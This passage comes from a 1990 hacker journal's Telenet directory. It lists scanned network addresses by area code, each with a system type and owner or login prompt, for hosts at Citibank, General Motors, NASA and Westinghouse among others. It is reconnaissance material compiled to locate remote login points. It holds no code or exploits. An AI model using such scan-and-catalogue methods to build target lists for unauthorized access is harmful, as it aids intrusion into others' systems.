VAX $ 103 <> $ 104 VAX 175 enter a for astra $ 176 VAX PBGNY 178 VAX Citibank VAXC 179 VAX Citibank VAXC $ 180 Decserver $ 181 Decserver $ 182 Decserver * 183 * 184 * 185 * 186 $ 187 Decserver $ 189 Decserver 193 PRIME $ 199 RSX-11 201 C/C/M 202 C/C/M 203 C/C/M 204 C/C/M 208 C/C/M 260 VAX * 1000 224--CITIBANK--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 2 VAX Global Report 5 7 Citibank Test 9 VAX 13 16 PLEASE SIGN ON 17 Citibanking Hong Kong 22 24 Decserver 26 Mexico Babymail 27 Decserver 28 Decserver 36 Citibank Mexico 47 PPD Communications Network 51 " 52 Citibank Mexico 57 VAX 58 Citibank Venesuela 59 Citibank Quito 60 Citibank CBK3 61 Citibank Sidney 62 Citibank Jakarta 63 Citibank Manila 64 Citibank New Zealand 65 Citibank Singapore 66 67 68 Argentina Mail 71 ENTER TRANSACTION ID: 73 Decserver 74 CHANNEL 03/104 76 Cititrak BBS 78 Citibank Hong Kong 79 Citibank New York 81 Citibank Tokyo 82 Citibank Seoul 83 Citibank New York 84 World Corp. Group 85 Citibank Hong kong 86 Citibank Singapore 87 Decserver 88 Citibank Taipei 89 Citibank ICC 90 WANG VS BANCO INTERNAL 91 PRIME 92 93 94 IBM 3270 CSGCOPRO 97 CitiMail-Asia Pacific 98 C/C/M 100 CitiSwitch, New York 101 BMS==> 102 CitiSwitch Hong Kong 103 BRAZILMAIL 104 BMS==> 105 Type . 106 Citibank Panama 107 108 C/C/M 109 Citibank Baharain 110 Citibank Puerto Rico 111 113 Citibank London 114 115 117 Citibank Hong Kong 118 NEWNET BS 119 Decserver 121 NEWNET BS 122 VAX Global Report 125 ENTER TRANSACTION ID: 127 Citibank Jakarta 128 PRIME 129 VAX CitiTreasury Products 130 VAX " 131 Citibank New York 134 137 HP-3000 138 139 VAX I.B.F.S. 140 " 141 HP-3000 145 PRIME 150 Citibank New Jersey 151 154 PRIME 160 161 VAX FIG ADMIN 162 PRIME 163 PRIME 164 PRIME WINMIS 165 GS/1 IBISM Elctronic Village 166 VAX CitiTreasury Products 167 VAX " 168 VAX Global Report 170 Electronic Cash Manager 173 HELP Online User Manager 174 PRIME 175 enter a for astra 176 Decserver 177 178 VAX CRIS 179 Citinet 180 ENTER QUOTDIAL ID: 181 Citimail II N. America 183 PRIME 187 Decserver 188 GS/1 Cititrust WIN 190 HP-3000 191 ENTER TYPE NUMBER 192 HP-3000 193 HP-3000 196 VAX CMA1 197 HRINFO NETWORK 199 CHANNEL 08/017 200 Citibank Baharain 201 CitiMail-Asia Pacific 202 " 203 Citibank Hong Kong 204 LAGB LATINMAIL 205 207 CitiBanking SUC.MONTEVIDEO 213 217 219 Citibank Stockholm 221 222 XENIX 223 VAX Global Report 224 PRIME 229 VAX Global Report 231 501 PRIME ATG 506 IBM Citibank Hong Kong 229--GENERAL MOTORS--ADDRESSES SCANNED: 0-500 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 113 DCIPC 114 %@CTVVAUd@dUYECVGUIied 118 " " 137 VAX 152 VAX 171 (Channel b.h128.001) 172 " " 176 NOS 177 (Channel b.h101.001) 178 (Channel b.h128.001) 179 " " 181 USER NUMBER-- 183 USER NUMBER-- 184 Division: 185 187 DEC20 219 VM/370 220 226 VAX 310 PRIME 311 IUeASID@CVTTAUD@bhUcAg 301--NARYLAND--ADDRESSES SCANNED: 0-500 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 20 PLEASE ENTER /LOGIN * 21 24 The Source 26 DNAMD1 Online 28 The Source 31 PRIME NUSA 33 VOS United Communications Corp 38 The Source * 39 * 43 45 RNN/NGW * 46 47 The Source 48 The Source 49 The Source $ 52 PRIME 56 RNN/NGW 57 RNN/NGW 58 PRIME CDA Online Services * 60a * 61a $ 63 PRIME PINET $ 65 PRIME APHISB 74 (I)nt (D)atapac (T)elenet * 77 * 78 100 VOS United Communications Corp 102 CYBER Arbitron 103 " " 104 " " 105 " " 106 " " 107 " " 108 " " 109 " " 110 " " 111 " " 112 " " 113 " " 114 " " 115 " " 116 " " $ 125 VAX 132 ElHill 3 140 VAX 141 USER ID $ 150 VAX 156 The Source 157 The Source 158 The Source 159 The Source 162 The Source * 165 $ 167 VAX Manger Support System $ 68 VAX 170 VOS United Communications Corp $ 173 ID $ 175 ID $ 176 HP-3000 178 CYBER Arbitron $ 243 PRIME $ 245 PRIME $ 246 PRIME $ 247 PRIME 249 VAX Tamsco 301 PRIME Primecom Network 302 " " " 303 " " " 307 PRIME 330 PRIME Primecom Network 331 " " " 332 " " " 333 " " " 334 " " " 335 " " " 336 VAX 337 Dialcom MHS 341 PRIME Primecom Network 342 " " " 343 " " " 344 " " " 345 " " " 346 " " " 350 " " " 351 " " " 352 " " " 353 " " " 354 " " " 356 " " " 357 " " " 358 " " " 361 " " " 363 " " " 364 " " " 390 " " " 391 " " " 392 " " " 393 " " " 394 " " " 396 " " " 398 " " " 399 " " " 408 The Source 430 The Source 435 The Source $ 440 INVALID-SW-CHARS * 441 * 442 * 443 * 444 * 445 * 446 * 447 * 448 * 449 * 450 * 451 * 452 $ 453 VAX $ 454 PRIME FRED 1001 Campus 2000 1002 Telecom Gold 1004 Telecom Gold 1017 Rev.19 1018 Telecom Gold 1040 VAX British Telecom 1041 " " 1047 " " 1049 " " 1050 " " 1051 " " 1052 " " 1053 " " 1054 " " 1055 " " 1057 " " 1058 " " 1060 UNIX Telecom Gold 1061 " " 1068 " " 1069 " " 1072 Telecom Gold 1073 " 1074 " 1075 " 1076 " 1077 " 1078 " 1079 " 1080 " 1081 " 1082 " 1083 " 1084 " 1085 " 1086 " 1087 " 1088 " 1089 " 1090 " 1200a " 2030 ID 2031 " 2032 " 2033 " 302--DELAWARE--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 31 ID * 32 $ 41 (Tymnet clone) 303-COLORADO--ADDRESSES SCANNED: 0-500 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 7 NCAR 8 NCAR $ 21 PC Pursuit Dialer (2400) 38 PRIME SL $ 50 AOS $ 52 PRIME DWRC $ 54 AOS $ 57 PRIME DENVER $ 60 AOS * 64 * 65 $ 66 AOS $ 68 AOS $ 69 AOS $ 78 AOS 100 enter switch characters $ 114 PC Pursuit Dialer (300) $ 115 PC Pursuit Dialer (1200) 120 PRIME SAMSON $ 130 AOS 131 Petroleum Info Network $ 138 AOS 140 X29 Password: $ 145 AOS $ 146 AOS $ 149 ID * 152 $ 154 AOS $ 155 AOS $ 156 AOS $ 157 AOS $ 158 AOS $ 159 AOS $ 168 AOS $ 169 AOS $ 172 AOS $ 176 AOS $ 177 AOS * 179 * 200 $ 231 AOS $ 239 AOS * 244 * 250 $ 253 AOS * 256 $ 257 AOS * 266 314 335 PRIME UDEN01 $ 342 HP-3000 350 VAX $ 353 AOS $ 354 AOS $ 355 AOS $ 356 AOS $ 434 AOS * 463 $ 470 AOS 304--WEST VIRGINIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 AOS $ 32 ID * 34 * 41 100 WVNET 130 WVNET 305--FLORIDA--ADDRESSES SCANNED: 0-900 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 4 Martin Marietta 20 22 HP-3000 35 ENTER SWITCH CHARACTERS * 51 * 52 * 56 63 HP-3000 * 67 * 68 * 69 73 HP-3000 $ 120 PC Pursuit Dialer (300) $ 121 PC Pursuit Dialer (1200) $ 122 PC Pursuit Dialer (2400) 129 HP-3000 * 135 136 137 138 HP-3000 140 148 VAX 156 VAX EVF 159 VU/TEXT * 235 * 236 239 VM/370 $ 240 HP-3000 248 VAX 255 VAX * 262 * 263 $ 268 278 PACKET/74 330a * 337 $ 338 VAX AIM $ 345 PRIME MIAMI * 350 * 351 * 360 * 361 365 Martin Marietta $ 370 No access to this DTE 371 VAX (In Spanish) * 433 570 590 623 Telenet Async to 3270 644 312--ILLINOIS--ADDRESSES SCANNED: 0-1200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 24 PC Pursuit Dialer (2400) 34 Your entry is incorrect $ 35 VTAM/TSO * 37 41 Your entry is incorrect 42 # 43 # 46 SYSTEM SECURITY STANDARDS 63 PEOPLE/LINK $ 64 Purdue ISN $ 65 COMMAND UNRECOGNIZED 70 PEOPLE/LINK * 71 * 77 * 78 101a 108a 121 enter system id-- 131 VM/370 $ 133 135 PEOPLE/LINK 142 HP-3000 $ 146 HP-3000 $ 147 ONLINE 150 Please enter SUBSCRIBERID $ 158 HP-3000 159 Please enter SUBSCRIBERID 160 PASSWORD 161 " 162 " 163 " $ 166 ONLINE $ 170 VAX SKMIC4 219 enter system id-- 222 PASSWORD 227 PASSWORD $ 231 USSMSG02 233 PASSWORD 235 PASSWORD * 245 247 * 253 * 254 $ 255 Enter host access code: 256 Please LOGIN 258 ID: * 263 289 Baxter ASAP System 300a WANG VS SREA 301a " " 302a " " 303a " " 304a " " 305a " " 306a " " 307a " " 308a " " 309a " " 310a " " 311a " " 312a " " 313a " " 314a " " 315a " " 316a " " 317a " " 318a " " 319a " " * 338 * 341 * 354 370 PEOPLE/LINK 373a 374 Information Resources 375 VAX Marketing Fact Book 378 Baxter ASAP System * 391 * 392 * 394 * 395 * 397 $ 398 MHP201A 400 Baxter ASAP System 401 " 402 " 403 " 404 " 406 COMMAND UNRECOGNIZED $ 410 PC Pursuit Dialer (300) $ 411 PC Pursuit Dialer (1200) * 420 * 421 $ 422 MHP201A * 425 * 427 * 428 * 431 $ 434 Purdue ISN $ 435 HP-3000 $ 439 Purdue ISN * 442 * 469 * 475 * 476 * 477 520 R59X01 login: 521 " 522 " 523 " 524 " 525 " 526 PASSWORD 527 PASSWORD 528 PASSWORD 532 VAX OMNI 534 535 536 548 $ 571 $ 572 $ 575 $ 576 $ 577 $ 580 $ 581 $ 590 $ 591 $ 592 $ 593 $ 594 $ 595 $ 596 $ 597 583 584 586 587 588 589 655 Baxter ASAP System 740 Telenet Async to 3270 741a Telenet Async to 3270 * 759 * 761 * 762 * 763 * 764 * 766 * 767 * 768 * 769 $ 770 Telenet Async to 3270 $ 771a Telenet Async to 3270 $ 772 Telenet Async to 3270 1030 VAX First Options of Chicago 1031 VAX " 1032 VAX " 1033 VAX " 1034 VAX " 1035 VAX " 1036 VAX " 1037 VAX " 1038 VAX " 1112 1127 1130 R52XO1 login: 1131 " 1132 " 1133 " 1134 " 1135 " 1136 " 1137 " 1138 " 1139 " 1140 " 1141 " 1142 " 1143 " 1144 " 313--MICHIGAN--ADDRESSES SCANNED: 0-400 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 24 PC Pursuit Dialer (2400) 25 COMSHARE $ 30 VAX GVN VAX CLUSTER 37 enter system id-- 38 " 40 Autonet 41 Autonet 43 enter system id-- 50 enter system id-- 61 enter system id-- 62 merit:x.25 64 Telenet Async to 3270 65a Telenet Async to 3270 68 (I)nternational (D)atapac * 75 $ 77 ID 82 NTUSSTB5 83 " 85 enteer system id-- 119 PASSWORD 120 " 145 enter your access code? 146 " 148 ENTER YOUR SUBSCRIBERID; 160 PASSWORD 161 " 162 " 164 VU/TEXT 165 enter user ID 172 " 173 VAX IPP 202 merit:x.25 210a $ 214 PC Pursuit Dialer (300) $ 216 PC Pursuit Dialer (1200) * 231 233 239 UNIX GTE * 245 249 250 HP-3000 252 255 $$50 DEVICE TYPE ID 256 " * 257 346 ?1040 347 " 314--MISSOURI--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 5 PC Pursuit Dialer (2400) $ 20 PC Pursuit Dialer (1200) $ 33 AOS $ 35 AOS $ 36 AOS $ 37 AOS $ 38 AOS * 39 $ 40 AOS $ 45 AOS * 50 * 57 131 MDCIS 132 Type User Name $ 157 PRIME JEFCTY $ 179 ID * 240 * 241 * 242 * 243 * 244 * 245 * 246 * 247 * 248 * 249 * 250 * 251 * 252 * 253 315--NEW YORK--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 20 enter system id $ 32 COMMAND UNRECOGNIZED $ 50 enter terminal type $ 130 ID 134 enter system id 135 " 136 " $ 137 GTE CAMILLUS NY $ 149 GTE CAMILLUS NY 150 GTE CAMILLUS NY 151 " 154 155 156 5294 Controller 157a 5294 Controller 317--INDIANA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 ID * 31 32 PRC ACF/VTAM 34 PRC ACF/VTAM 41 318--LOUISIANA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS * 57 321--SPAN--ADDRESSES SCANNED: VARIOUS $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 104 NASA Packet Network 150 PRIME $ 160 VAX NASA/MFSC 1030 VAX MIPS10 1036 VAX US GOVERNMENT VAX 1056 PRIME 2023 PRIME 3035 VAX FLYBOY 4027a ALPHA 5 * 7034 7036 LUT 3.2> $ 7055 VAX 7064 PRIME 334--UNKNOWN--ADDRESSES SCANNED: VARIOUS $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 100 National Computer Center $ 102 " $ 103 Enter Terminal id? $ 130 NARDAC $ 131 NARDAC * 200 $ 500 * 560 335--UNKNOWN--ADDRESSES SCANNED: VARIOUS $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 12 * 13 * 110 * 111 * 120 * 121 * 122 * 123 * 124 * 210 336--UNKNOWN--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 21 VAX USDA $ 22 VAX " $ 40 AOS 159 VAX $ 165 VAX VSFCA 173 Unisys Telcom 174 " 179 " * 180 $ 181 $ 182 FCCC * 183 $ 185 IVeASID@CVTTAUD@bhUeAg $ 200 AOS $ 240 PRIME $ 250 AOS $ 260 AOS * 604 337--UNKNOWN--ADDRESSES SCANNED: VARIOUS $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 10a $ 15a * 100 * 101 $ 110 V28048DA $ 120 AOS * 200 * 201 * 202 * 203 343--BURROUGHS--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 190 BURROUGHS 401--RHODE ISLAND--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 42 ID * 50 612 Modem City 402--NEBRASKA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 40 ID * 52 55 Dynix * 56 $ 60 64a 404--GEORGIA--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 22 PC Pursuit Dialer (2400) * 33 $ 36 AOS $ 37 AOS * 40 * 47 $ 72 ID $ 113 PC Pursuit Dialer (300) $ 114 PC Pursuit Dialer (1200) $ 124 * 127 $ 128 $ 130 * 136 * 175 * 230 405--OKLAHOMA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 19 $ 20 * 32 * 33 34 45 Hertz 46 C@ 406--MONTANA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 32 AOS $ 33 AOS $ 37 AOS $ 44 AOS $ 45 AOS $ 46 AOS $ 47 AOS $ 48 AOS $ 51 AOS $ 52 AOS $ 53 AOS $ 58 AOS $ 61 AOS $ 62 AOS $ 63 AOS $ 64 AOS $ 65 AOS $ 75 AOS * 125 $ 131 AOS $ 132 AOS $ 133 AOS * 140 * 142 * 145 * 148 $ 150 AOS $ 155 AOS $ 157 AOS $ 158 AOS $ 159 AOS $ 161 AOS $ 162 AOS $ 163 AOS $ 176 AOS $ 178 AOS 408--CALIFORNIA--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 21 PC Pursuit Dialer (2400) $ 38 AOS $ 41 AOS * 49 * 53 58a 62 TACL1> * 76 84a $ 110 PC Pursuit Dialer (300) $ 111 PC Pursuit Dialer (1200) 121 HP-3000 126a $ 133 UNIX $ 135 SCS-SALES * 149 154 PRIME GREGOR $ 159 VAX $ 174 AOS * 175 235 Global Weather MU2 238 UNIX $ 257 VAX MATRA DESIGN * 260 * 261 264 Portal * 267 * 268 * 271 274 BBB Version 20 280a 304 Call: 311 AMDAHL Network 312 CCC110A 313 AMDAHL Network 314 " 315 " $ 342 UNIX $ 344 VAX ANDO 346 UNIX $ 349 PCI (Tymnet clone) 352 $ 357 PCI (Tymnet clone) $ 358 " $ 359 " * 371 $ 375 PCI (Tymnet clone) $ 376 " $ 377 " 378 UNIX Sunlink 434 COMMAND UNRECOGNIZED 435 $ 439 PCI (Tymnet clone) $ 440 " $ 444 HP-3000 $ 445 VAX LAUREL $ 457 HP-3000 $ 461 AOS $ 462 AOS $ 463 AOS * 468 $ 469 AOS * 479 * 530 * 531 * 532 $ 534 HP-3000 $ 537 HP-3000 $ 538 HP-3000 * 560 $ 561 AOS * 562 * 563 * 564 * 565 * 566 * 567 $ 568 AOS $ 569 AOS * 570 * 571 * 572 * 573 * 574 $ 610 HP-3000 619 HP-3000 * 620 627 Fujitsu America 410--RCA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 0 RCA 412--PENNSYLVANIA--ADDRESSES SCANNED: 0-800 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 33 Enter Usercode: $ 34 LORD Corporation $ 35a Telenet Async to 3270 42 Federated Edge 43 " 47 Enter Logon 48 " 49 " 51 " 52 " 55 COMMAND UNRECOGNIZED 61 63 67 enter terminal id * 68 79 Federated Edge 117 VAX * 122 276 COMMAND UNRECOGNIZED 277 " 278 " 279 " * 331 340 Mellon Bank 341 C@ 342 COMMAND UNRECOGNIZED 349 *** ENTER LOGON 352 " 354 VAX 355 C@ 360 VAX 430 431 671 Carnegie-Mellon MICOM-B 413--MASSACHUSETTS--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 21 TW81 414--WISCONSIN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 PC Pursuit Dialer (300) $ 21 PC Pursuit Dialer (1200) $ 31 AOS $ 34 AOS $ 36 AOS * 38 $ 46 PRIME SYSU 49 MMISC 60 MGIC 81a * 120 $ 131 AOS $ 132 AOS $ 134 AOS $ 136 AOS $ 137 AOS * 151 153 189a 415--CALIFORNIA--ADDRESSES SCANNED: 0-1300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 5 PC Pursuit Dialer (2400) 7 HP-3000 $ 11 PC Pursuit Dialer (1200) 20 Dialog 27 Stanford Data Center 29 Stnaford U. Hospital $ 34 AOS 38 HP-3000 * 39 $ 45 PRIME CESSF 48 Dialog 49 " 53 VAX $ 106 Telenet Async to 3270 $ 108 PC Pursuit Dialer (300) $ 109 PC Pursuit Dialer (1200) $ 130 AOS * 138 * 139 * 142 * 143 * 144 * 145 $ 157 VAX MENLO 158 ComMail Esprit de Corp $ 164 AOS 167 PRIME VESTEK * 174 * 178 $ 215 PC Pursuit Dialer (300) $ 216 PC Pursuit Dialer (1200) $ 217 PC Pursuit Dialer (2400) $ 224 PC Pursuit Dialer (2400) 238 GEONET 239 Telenet Async to 3270 242 VAX * 252 269 LUT Rel 3.2> $ 333 AOS $ 335 AOS 338 Telenet Async to 3270 342 Dialog 343 Telenet Async to 3270 345 SBE Inc. * 348 * 370 379 VAX $ 431 AOS $ 434 AOS $ 436 AOS $ 437 AOS $ 438 AOS 452 Telmar Intl Network * 460 * 468 $ 470 $ 471 $ 541 AOS $ 542 AOS $ 543 AOS $ 544 AOS $ 545 AOS * 546 $ 547 AOS $ 549 AOS * 551 * 560 * 571 572 VAX 575 VAX SPRINT 576 578 672 Telenet Async to 3270 698 $ 730 AOS $ 731 AOS $ 732 AOS $ 733 AOS * 734 * 735 * 736 * 737 * 738 * 739 * 740 * 741 780 827 1030 PRIME 1036 OVL 111 44 IDLE 1037 1038 1055 1063 1200 enter switch characters 1201 " 1202 " 1205 " 419--OHIO--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 35 422--WESTINGHOUSE--ADDRESSES SCANNED: 0-1125 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 1 PRIME 2 102 ARDM1 104 HP-3000 106 GS/1 114 west pgh tcc 115 corp info service 121 AOS 126 tcc1 127 csc2 130 PRIME 132 UNIX 135 UNIX 140 141 VAX 180 MHP1201I 182 " 183 " 185 " 187 " 194 Commtex CX-80 221 222 HP-3000 223 VAX 229 424--UNKNOWN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 100 101 102 103 104 114 115 116 122 123 129 130 ============================================================================== End of First Half of LOD/H Telenet Directory, Rev. #5 ============================================================================== The LOD/H Technical Journal, Issue #4: File #09 of 10 The Legion Of Hackers Present: Updated: Telenet Directory Part B: Addresses 501XXX to 919XXX Revision #5 Last Updated: 2/10/90 (Includes Mnemonic Host Names) Scanned and Written by: Erik Bloodaxe 501--ARKANSAS--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 AOS * 32 * 38 $ 44 PRIME LROCK 502--KENTUCKY--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 50 * 58 * 60 * 61 503--OREGON--ADDRESSES SCANNED: 0-1000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 PC Pursuit Dialer (300) $ 21 PC Pursuit Dialer (1200) $ 30 AOS $ 31 AOS $ 32 $ 36 AOS $ 37 AOS $ 39 AOS $ 40 AOS * 41 $ 45 AOS $ 46 AOS $ 47 AOS $ 48 AOS $ 49 AOS $ 52 AOS $ 56 AOS $ 60 AOS $ 63 AOS $ 68 AOS $ 71 AOS 75 PLEASE SIGN ON $ 76 AOS $ 77 AOS $ 78 AOS 120 $ 130 AOS $ 132 AOS $ 134 AOS $ 136 AOS $ 137 AOS $ 138 AOS $ 141 AOS $ 142 AOS * 143 $ 147 AOS $ 149 AOS $ 150 TEKTRONIX 100 $ 151 AOS $ 152 AOS $ 154 AOS $ 156 AOS * 162 $ 167 AOS $ 168 AOS $ 169 AOS $ 170 AOS $ 174 AOS $ 177 AOS $ 200 AOS * 228 * 229 $ 230 AOS * 232 * 237 $ 238 AOS $ 239 AOS * 240 $ 241 AOS $ 242 AOS $ 243 ID $ 250 AOS $ 255 AOS $ 274 AOS $ 277 AOS $ 278 AOS $ 279 AOS $ 330 AOS $ 331 AOS $ 332 AOS $ 334 AOS $ 335 AOS $ 336 AOS $ 338 AOS $ 339 AOS $ 340 AOS $ 341 AOS $ 342 AOS $ 345 AOS $ 349 AOS $ 350 AOS $ 351 AOS $ 353 AOS $ 355 AOS $ 357 AOS $ 360 AOS $ 370 AOS $ 371 AOS $ 432 AOS $ 440 AOS 613 UNIX sequent 504--LOUISIANA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 22 $ 31 ID $ 32 AOS $ 33 AOS $ 34 AOS * 38 * 44 * 116 * 117 $ 140 AOS * 141 * 142 505--NEW MEXICO--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 ID $ 33 AOS * 34 $ 36 AOS $ 40 AOS * 45 $ 46 AOS $ 51 AOS $ 52 AOS $ 53 AOS $ 56 AOS $ 57 AOS $ 60 ICN Username: $ 61 Los Alamos $ 70 AOS $ 72 AOS $ 74 AOS $ 75 AOS $ 77 AOS $ 78 AOS $ 132 AOS $ 133 AOS * 134 $ 136 AOS $ 137 AOS $ 139 AOS $ 144 $ 150 509--WASHINGTON--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 25 AOS $ 26 AOS $ 31 AOS $ 32 ID * 33 $ 48 AOS $ 50 AOS $ 73 AOS $ 79 AOS * 130 * 140 * 145 511--UNKNOWN--ADDRESSES SCANNED: 0-250 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 87 512--TEXAS--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 5 $ 33 PRIME BROWNS $ 34 PRIME AUSTIN 40 * 55 * 62 * 63 * 64 * 65 136 * 139 142 VAX Gould Inc. $ 242 Primefax Info Service 513--OHIO--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 30 LEXIS/NEXIS 31 Meadnet * 32 $ 33 PRIME D01 $ 34 VAX $ 37 PRIME E03 $ 55 PRIME I01 $ 57 PRIME E04 59 Develnet $ 65 VAX * 66 $ 67 PRIME E09 $ 68 PRIME X01 * 69 $ 72 PRIME O1 * 73 $ 74 PRIME W01 * 75 $ 77 PRIME M01 $ 78 PRIME A02 $ 79 PRIME C2 $ 80 JETNET EVENDALE 131 LEXIS/NEXIS 132 " 133 " 134 " * 140 143 VAX * 144 * 158 515--IOWA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 30 LEXIS/NEXIS 31 " $ 39 PRIME NVSL $ 40 ID * 41 * 42 $ 43 PRIME DESMOM 131 LEXIS/NEXIS 516--NEW YORK--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 30 VAX OFFICE 35 CCI MULTILINK * 38 $ 41 VAX 45 VM/370 47 48a Customer id: 49a " 50a " * 140 $ 141 # CONNECT REQUESTED 157 $ 232 HP-3000 600 PRIME * 601 610 PRIME P550 617 Pi-Net 618 Pi-Net 625 VAX 655 517--MICHIGAN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 40 $ 42 AOS 518--NEW YORK--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 30 USSMSG2 31 " 35 " 36 " 37 " 601--MISSISSIPPI--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 ID $ 33 PRIME GLFPRT * 36 * 37 * 40 602--ARIZONA--ADDRESSES SCANNED: 0-1000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 22 PC Pursuit Dialer (300) $ 23 PC Pursuit Dialer (1200) $ 26 PC Pursuit Dialer (2400) * 30 * 32 $ 33 AOS $ 34 AOS $ 35 GTE COMMUNICATION SYSTEMS $ 53a CYBER * 55 $ 56 AOS $ 57 AOS $ 58 AOS $ 61 AOS $ 62 ID $ 65 AOS * 66 $ 67 AOS $ 100 AOS * 131 * 133 141a 142 $ 242 AOS $ 344 VAX BUSTOP * 349 * 350 * 351 * 352 * 353 * 354 * 355 * 356 * 357 * 358 * 359 * 360 * 361 603 $ 630 > 603--NEW HAMPSHIRE--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 Dartmouth College $ 30 AOS * 33 $ 36 ID $ 37 $ 40 46 USER NUMBER-- 51 CHUBBS online 53 CHUBBS online $ 57 ID * 58 66 USER NUMBER-- 135 VM/370 136 VM/370 * 137 603 VAX 606--KENTUCKY--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 ID $ 37 AOS 44 HP-3000 607--NEW YORK--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 30 * 32 44 enter system id 45 " 70 PRIME FDC99 * 131 * 136 